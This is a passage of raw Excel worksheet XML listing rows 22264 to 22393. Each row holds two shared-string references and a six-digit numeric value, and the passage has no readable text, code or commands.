      <c r="A22264" s="28" t="s">
        <v>27025</v>
      </c>
      <c r="B22264" s="14" t="s">
        <v>17495</v>
      </c>
      <c r="C22264" s="15">
        <v>881580</v>
      </c>
    </row>
    <row r="22265" spans="1:3">
      <c r="A22265" s="28" t="s">
        <v>27026</v>
      </c>
      <c r="B22265" s="14" t="s">
        <v>17496</v>
      </c>
      <c r="C22265" s="15">
        <v>884055</v>
      </c>
    </row>
    <row r="22266" spans="1:3">
      <c r="A22266" s="28" t="s">
        <v>27027</v>
      </c>
      <c r="B22266" s="14" t="s">
        <v>17497</v>
      </c>
      <c r="C22266" s="15">
        <v>885055</v>
      </c>
    </row>
    <row r="22267" spans="1:3">
      <c r="A22267" s="28" t="s">
        <v>27028</v>
      </c>
      <c r="B22267" s="14" t="s">
        <v>17498</v>
      </c>
      <c r="C22267" s="15">
        <v>886055</v>
      </c>
    </row>
    <row r="22268" spans="1:3">
      <c r="A22268" s="28" t="s">
        <v>27029</v>
      </c>
      <c r="B22268" s="14" t="s">
        <v>17499</v>
      </c>
      <c r="C22268" s="15">
        <v>887055</v>
      </c>
    </row>
    <row r="22269" spans="1:3">
      <c r="A22269" s="28" t="s">
        <v>27030</v>
      </c>
      <c r="B22269" s="14" t="s">
        <v>12789</v>
      </c>
      <c r="C22269" s="15">
        <v>888460</v>
      </c>
    </row>
    <row r="22270" spans="1:3">
      <c r="A22270" s="28" t="s">
        <v>27030</v>
      </c>
      <c r="B22270" s="14" t="s">
        <v>12789</v>
      </c>
      <c r="C22270" s="15">
        <v>888550</v>
      </c>
    </row>
    <row r="22271" spans="1:3">
      <c r="A22271" s="28" t="s">
        <v>27030</v>
      </c>
      <c r="B22271" s="14" t="s">
        <v>12789</v>
      </c>
      <c r="C22271" s="15">
        <v>888560</v>
      </c>
    </row>
    <row r="22272" spans="1:3">
      <c r="A22272" s="28" t="s">
        <v>27030</v>
      </c>
      <c r="B22272" s="14" t="s">
        <v>12789</v>
      </c>
      <c r="C22272" s="15">
        <v>888570</v>
      </c>
    </row>
    <row r="22273" spans="1:3">
      <c r="A22273" s="28" t="s">
        <v>27030</v>
      </c>
      <c r="B22273" s="14" t="s">
        <v>12789</v>
      </c>
      <c r="C22273" s="15">
        <v>888580</v>
      </c>
    </row>
    <row r="22274" spans="1:3">
      <c r="A22274" s="28" t="s">
        <v>27030</v>
      </c>
      <c r="B22274" s="14" t="s">
        <v>12789</v>
      </c>
      <c r="C22274" s="15">
        <v>888660</v>
      </c>
    </row>
    <row r="22275" spans="1:3">
      <c r="A22275" s="28" t="s">
        <v>27030</v>
      </c>
      <c r="B22275" s="14" t="s">
        <v>12789</v>
      </c>
      <c r="C22275" s="15">
        <v>888670</v>
      </c>
    </row>
    <row r="22276" spans="1:3">
      <c r="A22276" s="28" t="s">
        <v>27031</v>
      </c>
      <c r="B22276" s="14" t="s">
        <v>17500</v>
      </c>
      <c r="C22276" s="15">
        <v>889055</v>
      </c>
    </row>
    <row r="22277" spans="1:3">
      <c r="A22277" s="28" t="s">
        <v>27031</v>
      </c>
      <c r="B22277" s="14" t="s">
        <v>17500</v>
      </c>
      <c r="C22277" s="15">
        <v>889060</v>
      </c>
    </row>
    <row r="22278" spans="1:3">
      <c r="A22278" s="28" t="s">
        <v>27031</v>
      </c>
      <c r="B22278" s="14" t="s">
        <v>17500</v>
      </c>
      <c r="C22278" s="15">
        <v>889067</v>
      </c>
    </row>
    <row r="22279" spans="1:3">
      <c r="A22279" s="28" t="s">
        <v>27031</v>
      </c>
      <c r="B22279" s="14" t="s">
        <v>17500</v>
      </c>
      <c r="C22279" s="15">
        <v>889070</v>
      </c>
    </row>
    <row r="22280" spans="1:3">
      <c r="A22280" s="28" t="s">
        <v>27031</v>
      </c>
      <c r="B22280" s="14" t="s">
        <v>17500</v>
      </c>
      <c r="C22280" s="15">
        <v>889080</v>
      </c>
    </row>
    <row r="22281" spans="1:3">
      <c r="A22281" s="28" t="s">
        <v>27031</v>
      </c>
      <c r="B22281" s="14" t="s">
        <v>17500</v>
      </c>
      <c r="C22281" s="15">
        <v>889090</v>
      </c>
    </row>
    <row r="22282" spans="1:3">
      <c r="A22282" s="28" t="s">
        <v>27032</v>
      </c>
      <c r="B22282" s="14" t="s">
        <v>17500</v>
      </c>
      <c r="C22282" s="15">
        <v>889460</v>
      </c>
    </row>
    <row r="22283" spans="1:3">
      <c r="A22283" s="28" t="s">
        <v>27031</v>
      </c>
      <c r="B22283" s="14" t="s">
        <v>17500</v>
      </c>
      <c r="C22283" s="15">
        <v>889550</v>
      </c>
    </row>
    <row r="22284" spans="1:3">
      <c r="A22284" s="28" t="s">
        <v>27031</v>
      </c>
      <c r="B22284" s="14" t="s">
        <v>17500</v>
      </c>
      <c r="C22284" s="15">
        <v>889560</v>
      </c>
    </row>
    <row r="22285" spans="1:3">
      <c r="A22285" s="28" t="s">
        <v>27031</v>
      </c>
      <c r="B22285" s="14" t="s">
        <v>17500</v>
      </c>
      <c r="C22285" s="15">
        <v>889570</v>
      </c>
    </row>
    <row r="22286" spans="1:3">
      <c r="A22286" s="28" t="s">
        <v>27031</v>
      </c>
      <c r="B22286" s="14" t="s">
        <v>17500</v>
      </c>
      <c r="C22286" s="15">
        <v>889626</v>
      </c>
    </row>
    <row r="22287" spans="1:3">
      <c r="A22287" s="28" t="s">
        <v>27031</v>
      </c>
      <c r="B22287" s="14" t="s">
        <v>17500</v>
      </c>
      <c r="C22287" s="15">
        <v>889660</v>
      </c>
    </row>
    <row r="22288" spans="1:3">
      <c r="A22288" s="28" t="s">
        <v>27031</v>
      </c>
      <c r="B22288" s="14" t="s">
        <v>17500</v>
      </c>
      <c r="C22288" s="15">
        <v>889845</v>
      </c>
    </row>
    <row r="22289" spans="1:3">
      <c r="A22289" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22289" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22289" s="15">
        <v>890000</v>
      </c>
    </row>
    <row r="22290" spans="1:3">
      <c r="A22290" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22290" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22290" s="15">
        <v>890290</v>
      </c>
    </row>
    <row r="22291" spans="1:3">
      <c r="A22291" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22291" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22291" s="15">
        <v>890460</v>
      </c>
    </row>
    <row r="22292" spans="1:3">
      <c r="A22292" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22292" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22292" s="15">
        <v>890480</v>
      </c>
    </row>
    <row r="22293" spans="1:3">
      <c r="A22293" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22293" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22293" s="15">
        <v>890490</v>
      </c>
    </row>
    <row r="22294" spans="1:3">
      <c r="A22294" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22294" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22294" s="15">
        <v>890550</v>
      </c>
    </row>
    <row r="22295" spans="1:3">
      <c r="A22295" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22295" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22295" s="15">
        <v>890560</v>
      </c>
    </row>
    <row r="22296" spans="1:3">
      <c r="A22296" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22296" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22296" s="15">
        <v>890570</v>
      </c>
    </row>
    <row r="22297" spans="1:3">
      <c r="A22297" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22297" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22297" s="15">
        <v>890580</v>
      </c>
    </row>
    <row r="22298" spans="1:3">
      <c r="A22298" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22298" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22298" s="15">
        <v>890590</v>
      </c>
    </row>
    <row r="22299" spans="1:3">
      <c r="A22299" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22299" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22299" s="15">
        <v>890645</v>
      </c>
    </row>
    <row r="22300" spans="1:3">
      <c r="A22300" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22300" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22300" s="15">
        <v>890660</v>
      </c>
    </row>
    <row r="22301" spans="1:3">
      <c r="A22301" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22301" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22301" s="15">
        <v>890667</v>
      </c>
    </row>
    <row r="22302" spans="1:3">
      <c r="A22302" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22302" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22302" s="15">
        <v>890670</v>
      </c>
    </row>
    <row r="22303" spans="1:3">
      <c r="A22303" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22303" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22303" s="15">
        <v>890755</v>
      </c>
    </row>
    <row r="22304" spans="1:3">
      <c r="A22304" s="28" t="s">
        <v>27033</v>
      </c>
      <c r="B22304" s="14" t="s">
        <v>17501</v>
      </c>
      <c r="C22304" s="15">
        <v>890845</v>
      </c>
    </row>
    <row r="22305" spans="1:3">
      <c r="A22305" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22305" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22305" s="15">
        <v>891290</v>
      </c>
    </row>
    <row r="22306" spans="1:3">
      <c r="A22306" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22306" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22306" s="15">
        <v>891460</v>
      </c>
    </row>
    <row r="22307" spans="1:3">
      <c r="A22307" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22307" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22307" s="15">
        <v>891480</v>
      </c>
    </row>
    <row r="22308" spans="1:3">
      <c r="A22308" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22308" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22308" s="15">
        <v>891490</v>
      </c>
    </row>
    <row r="22309" spans="1:3">
      <c r="A22309" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22309" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22309" s="15">
        <v>891550</v>
      </c>
    </row>
    <row r="22310" spans="1:3">
      <c r="A22310" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22310" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22310" s="15">
        <v>891560</v>
      </c>
    </row>
    <row r="22311" spans="1:3">
      <c r="A22311" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22311" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22311" s="15">
        <v>891570</v>
      </c>
    </row>
    <row r="22312" spans="1:3">
      <c r="A22312" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22312" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22312" s="15">
        <v>891580</v>
      </c>
    </row>
    <row r="22313" spans="1:3">
      <c r="A22313" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22313" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22313" s="15">
        <v>891590</v>
      </c>
    </row>
    <row r="22314" spans="1:3">
      <c r="A22314" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22314" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22314" s="15">
        <v>891626</v>
      </c>
    </row>
    <row r="22315" spans="1:3">
      <c r="A22315" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22315" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22315" s="15">
        <v>891660</v>
      </c>
    </row>
    <row r="22316" spans="1:3">
      <c r="A22316" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22316" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22316" s="15">
        <v>891667</v>
      </c>
    </row>
    <row r="22317" spans="1:3">
      <c r="A22317" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22317" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22317" s="15">
        <v>891670</v>
      </c>
    </row>
    <row r="22318" spans="1:3">
      <c r="A22318" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22318" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22318" s="15">
        <v>891755</v>
      </c>
    </row>
    <row r="22319" spans="1:3">
      <c r="A22319" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22319" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22319" s="15">
        <v>891767</v>
      </c>
    </row>
    <row r="22320" spans="1:3">
      <c r="A22320" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22320" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22320" s="15">
        <v>891845</v>
      </c>
    </row>
    <row r="22321" spans="1:3">
      <c r="A22321" s="28" t="s">
        <v>27034</v>
      </c>
      <c r="B22321" s="14" t="s">
        <v>17502</v>
      </c>
      <c r="C22321" s="15">
        <v>891855</v>
      </c>
    </row>
    <row r="22322" spans="1:3">
      <c r="A22322" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22322" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22322" s="15">
        <v>892290</v>
      </c>
    </row>
    <row r="22323" spans="1:3">
      <c r="A22323" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22323" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22323" s="15">
        <v>892460</v>
      </c>
    </row>
    <row r="22324" spans="1:3">
      <c r="A22324" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22324" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22324" s="15">
        <v>892480</v>
      </c>
    </row>
    <row r="22325" spans="1:3">
      <c r="A22325" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22325" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22325" s="15">
        <v>892490</v>
      </c>
    </row>
    <row r="22326" spans="1:3">
      <c r="A22326" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22326" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22326" s="15">
        <v>892550</v>
      </c>
    </row>
    <row r="22327" spans="1:3">
      <c r="A22327" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22327" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22327" s="15">
        <v>892560</v>
      </c>
    </row>
    <row r="22328" spans="1:3">
      <c r="A22328" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22328" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22328" s="15">
        <v>892570</v>
      </c>
    </row>
    <row r="22329" spans="1:3">
      <c r="A22329" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22329" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22329" s="15">
        <v>892580</v>
      </c>
    </row>
    <row r="22330" spans="1:3">
      <c r="A22330" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22330" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22330" s="15">
        <v>892590</v>
      </c>
    </row>
    <row r="22331" spans="1:3">
      <c r="A22331" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22331" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22331" s="15">
        <v>892626</v>
      </c>
    </row>
    <row r="22332" spans="1:3">
      <c r="A22332" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22332" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22332" s="15">
        <v>892645</v>
      </c>
    </row>
    <row r="22333" spans="1:3">
      <c r="A22333" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22333" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22333" s="15">
        <v>892660</v>
      </c>
    </row>
    <row r="22334" spans="1:3">
      <c r="A22334" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22334" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22334" s="15">
        <v>892667</v>
      </c>
    </row>
    <row r="22335" spans="1:3">
      <c r="A22335" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22335" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22335" s="15">
        <v>892670</v>
      </c>
    </row>
    <row r="22336" spans="1:3">
      <c r="A22336" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22336" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22336" s="15">
        <v>892755</v>
      </c>
    </row>
    <row r="22337" spans="1:3">
      <c r="A22337" s="28" t="s">
        <v>27035</v>
      </c>
      <c r="B22337" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22337" s="15">
        <v>892767</v>
      </c>
    </row>
    <row r="22338" spans="1:3">
      <c r="A22338" s="28" t="s">
        <v>27036</v>
      </c>
      <c r="B22338" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22338" s="15">
        <v>892845</v>
      </c>
    </row>
    <row r="22339" spans="1:3">
      <c r="A22339" s="28" t="s">
        <v>27036</v>
      </c>
      <c r="B22339" s="14" t="s">
        <v>17503</v>
      </c>
      <c r="C22339" s="15">
        <v>892855</v>
      </c>
    </row>
    <row r="22340" spans="1:3">
      <c r="A22340" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22340" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22340" s="15">
        <v>893290</v>
      </c>
    </row>
    <row r="22341" spans="1:3">
      <c r="A22341" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22341" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22341" s="15">
        <v>893460</v>
      </c>
    </row>
    <row r="22342" spans="1:3">
      <c r="A22342" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22342" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22342" s="15">
        <v>893480</v>
      </c>
    </row>
    <row r="22343" spans="1:3">
      <c r="A22343" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22343" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22343" s="15">
        <v>893490</v>
      </c>
    </row>
    <row r="22344" spans="1:3">
      <c r="A22344" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22344" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22344" s="15">
        <v>893550</v>
      </c>
    </row>
    <row r="22345" spans="1:3">
      <c r="A22345" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22345" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22345" s="15">
        <v>893560</v>
      </c>
    </row>
    <row r="22346" spans="1:3">
      <c r="A22346" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22346" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22346" s="15">
        <v>893570</v>
      </c>
    </row>
    <row r="22347" spans="1:3">
      <c r="A22347" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22347" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22347" s="15">
        <v>893580</v>
      </c>
    </row>
    <row r="22348" spans="1:3">
      <c r="A22348" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22348" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22348" s="15">
        <v>893590</v>
      </c>
    </row>
    <row r="22349" spans="1:3">
      <c r="A22349" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22349" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22349" s="15">
        <v>893626</v>
      </c>
    </row>
    <row r="22350" spans="1:3">
      <c r="A22350" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22350" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22350" s="15">
        <v>893660</v>
      </c>
    </row>
    <row r="22351" spans="1:3">
      <c r="A22351" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22351" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22351" s="15">
        <v>893667</v>
      </c>
    </row>
    <row r="22352" spans="1:3">
      <c r="A22352" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22352" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22352" s="15">
        <v>893670</v>
      </c>
    </row>
    <row r="22353" spans="1:3">
      <c r="A22353" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22353" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22353" s="15">
        <v>893755</v>
      </c>
    </row>
    <row r="22354" spans="1:3">
      <c r="A22354" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22354" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22354" s="15">
        <v>893767</v>
      </c>
    </row>
    <row r="22355" spans="1:3">
      <c r="A22355" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22355" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22355" s="15">
        <v>893845</v>
      </c>
    </row>
    <row r="22356" spans="1:3">
      <c r="A22356" s="28" t="s">
        <v>27037</v>
      </c>
      <c r="B22356" s="14" t="s">
        <v>17504</v>
      </c>
      <c r="C22356" s="15">
        <v>893855</v>
      </c>
    </row>
    <row r="22357" spans="1:3">
      <c r="A22357" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22357" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22357" s="15">
        <v>894290</v>
      </c>
    </row>
    <row r="22358" spans="1:3">
      <c r="A22358" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22358" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22358" s="15">
        <v>894460</v>
      </c>
    </row>
    <row r="22359" spans="1:3">
      <c r="A22359" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22359" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22359" s="15">
        <v>894480</v>
      </c>
    </row>
    <row r="22360" spans="1:3">
      <c r="A22360" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22360" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22360" s="15">
        <v>894490</v>
      </c>
    </row>
    <row r="22361" spans="1:3">
      <c r="A22361" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22361" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22361" s="15">
        <v>894550</v>
      </c>
    </row>
    <row r="22362" spans="1:3">
      <c r="A22362" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22362" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22362" s="15">
        <v>894560</v>
      </c>
    </row>
    <row r="22363" spans="1:3">
      <c r="A22363" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22363" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22363" s="15">
        <v>894570</v>
      </c>
    </row>
    <row r="22364" spans="1:3">
      <c r="A22364" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22364" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22364" s="15">
        <v>894580</v>
      </c>
    </row>
    <row r="22365" spans="1:3">
      <c r="A22365" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22365" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22365" s="15">
        <v>894590</v>
      </c>
    </row>
    <row r="22366" spans="1:3">
      <c r="A22366" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22366" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22366" s="15">
        <v>894660</v>
      </c>
    </row>
    <row r="22367" spans="1:3">
      <c r="A22367" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22367" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22367" s="15">
        <v>894667</v>
      </c>
    </row>
    <row r="22368" spans="1:3">
      <c r="A22368" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22368" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22368" s="15">
        <v>894670</v>
      </c>
    </row>
    <row r="22369" spans="1:3">
      <c r="A22369" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22369" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22369" s="15">
        <v>894755</v>
      </c>
    </row>
    <row r="22370" spans="1:3">
      <c r="A22370" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22370" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22370" s="15">
        <v>894767</v>
      </c>
    </row>
    <row r="22371" spans="1:3">
      <c r="A22371" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22371" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22371" s="15">
        <v>894845</v>
      </c>
    </row>
    <row r="22372" spans="1:3">
      <c r="A22372" s="28" t="s">
        <v>27038</v>
      </c>
      <c r="B22372" s="14" t="s">
        <v>17505</v>
      </c>
      <c r="C22372" s="15">
        <v>894855</v>
      </c>
    </row>
    <row r="22373" spans="1:3">
      <c r="A22373" s="28" t="s">
        <v>27039</v>
      </c>
      <c r="B22373" s="14" t="s">
        <v>17506</v>
      </c>
      <c r="C22373" s="15">
        <v>895290</v>
      </c>
    </row>
    <row r="22374" spans="1:3">
      <c r="A22374" s="28" t="s">
        <v>27039</v>
      </c>
      <c r="B22374" s="14" t="s">
        <v>17506</v>
      </c>
      <c r="C22374" s="15">
        <v>895460</v>
      </c>
    </row>
    <row r="22375" spans="1:3">
      <c r="A22375" s="28" t="s">
        <v>27039</v>
      </c>
      <c r="B22375" s="14" t="s">
        <v>17506</v>
      </c>
      <c r="C22375" s="15">
        <v>895480</v>
      </c>
    </row>
    <row r="22376" spans="1:3">
      <c r="A22376" s="28" t="s">
        <v>27039</v>
      </c>
      <c r="B22376" s="14" t="s">
        <v>17506</v>
      </c>
      <c r="C22376" s="15">
        <v>895490</v>
      </c>
    </row>
    <row r="22377" spans="1:3">
      <c r="A22377" s="28" t="s">
        <v>27039</v>
      </c>
      <c r="B22377" s="14" t="s">
        <v>17506</v>
      </c>
      <c r="C22377" s="15">
        <v>895550</v>
      </c>
    </row>
    <row r="22378" spans="1:3">
      <c r="A22378" s="28" t="s">
        <v>27039</v>
      </c>
      <c r="B22378" s="14" t="s">
        <v>17506</v>
      </c>
      <c r="C22378" s="15">
        <v>895560</v>
      </c>
    </row>
    <row r="22379" spans="1:3">
      <c r="A22379" s="28" t="s">
        <v>27039</v>
      </c>
      <c r="B22379" s="14" t="s">
        <v>17506</v>
      </c>
      <c r="C22379" s="15">
        <v>895570</v>
      </c>
    </row>
    <row r="22380" spans="1:3">
      <c r="A22380" s="28" t="s">
        <v>27039</v>
      </c>
      <c r="B22380" s="14" t="s">
        <v>17506</v>
      </c>
      <c r="C22380" s="15">
        <v>895590</v>
      </c>
    </row>
    <row r="22381" spans="1:3">
      <c r="A22381" s="28" t="s">
        <v>27039</v>
      </c>
      <c r="B22381" s="14" t="s">
        <v>17506</v>
      </c>
      <c r="C22381" s="15">
        <v>895660</v>
      </c>
    </row>
    <row r="22382" spans="1:3">
      <c r="A22382" s="28" t="s">
        <v>27039</v>
      </c>
      <c r="B22382" s="14" t="s">
        <v>17506</v>
      </c>
      <c r="C22382" s="15">
        <v>895667</v>
      </c>
    </row>
    <row r="22383" spans="1:3">
      <c r="A22383" s="28" t="s">
        <v>27039</v>
      </c>
      <c r="B22383" s="14" t="s">
        <v>17506</v>
      </c>
      <c r="C22383" s="15">
        <v>895670</v>
      </c>
    </row>
    <row r="22384" spans="1:3">
      <c r="A22384" s="28" t="s">
        <v>27039</v>
      </c>
      <c r="B22384" s="14" t="s">
        <v>17506</v>
      </c>
      <c r="C22384" s="15">
        <v>895755</v>
      </c>
    </row>
    <row r="22385" spans="1:3">
      <c r="A22385" s="28" t="s">
        <v>27040</v>
      </c>
      <c r="B22385" s="14" t="s">
        <v>17507</v>
      </c>
      <c r="C22385" s="15">
        <v>896055</v>
      </c>
    </row>
    <row r="22386" spans="1:3">
      <c r="A22386" s="28" t="s">
        <v>27041</v>
      </c>
      <c r="B22386" s="14" t="s">
        <v>17508</v>
      </c>
      <c r="C22386" s="15">
        <v>897055</v>
      </c>
    </row>
    <row r="22387" spans="1:3">
      <c r="A22387" s="28" t="s">
        <v>27042</v>
      </c>
      <c r="B22387" s="14" t="s">
        <v>17509</v>
      </c>
      <c r="C22387" s="15">
        <v>898290</v>
      </c>
    </row>
    <row r="22388" spans="1:3">
      <c r="A22388" s="28" t="s">
        <v>27042</v>
      </c>
      <c r="B22388" s="14" t="s">
        <v>17509</v>
      </c>
      <c r="C22388" s="15">
        <v>898667</v>
      </c>
    </row>
    <row r="22389" spans="1:3">
      <c r="A22389" s="28" t="s">
        <v>27042</v>
      </c>
      <c r="B22389" s="14" t="s">
        <v>17509</v>
      </c>
      <c r="C22389" s="15">
        <v>898767</v>
      </c>
    </row>
    <row r="22390" spans="1:3">
      <c r="A22390" s="28" t="s">
        <v>27042</v>
      </c>
      <c r="B22390" s="14" t="s">
        <v>17509</v>
      </c>
      <c r="C22390" s="15">
        <v>898855</v>
      </c>
    </row>
    <row r="22391" spans="1:3">
      <c r="A22391" s="28" t="s">
        <v>27043</v>
      </c>
      <c r="B22391" s="14" t="s">
        <v>17510</v>
      </c>
      <c r="C22391" s="15">
        <v>899290</v>
      </c>
    </row>
    <row r="22392" spans="1:3">
      <c r="A22392" s="28" t="s">
        <v>27043</v>
      </c>
      <c r="B22392" s="14" t="s">
        <v>17510</v>
      </c>
      <c r="C22392" s="15">
        <v>899545</v>
      </c>
    </row>
    <row r="22393" spans="1:3">
      <c r="A22393" s="28" t="s">
        <v>27043</v>
      </c>
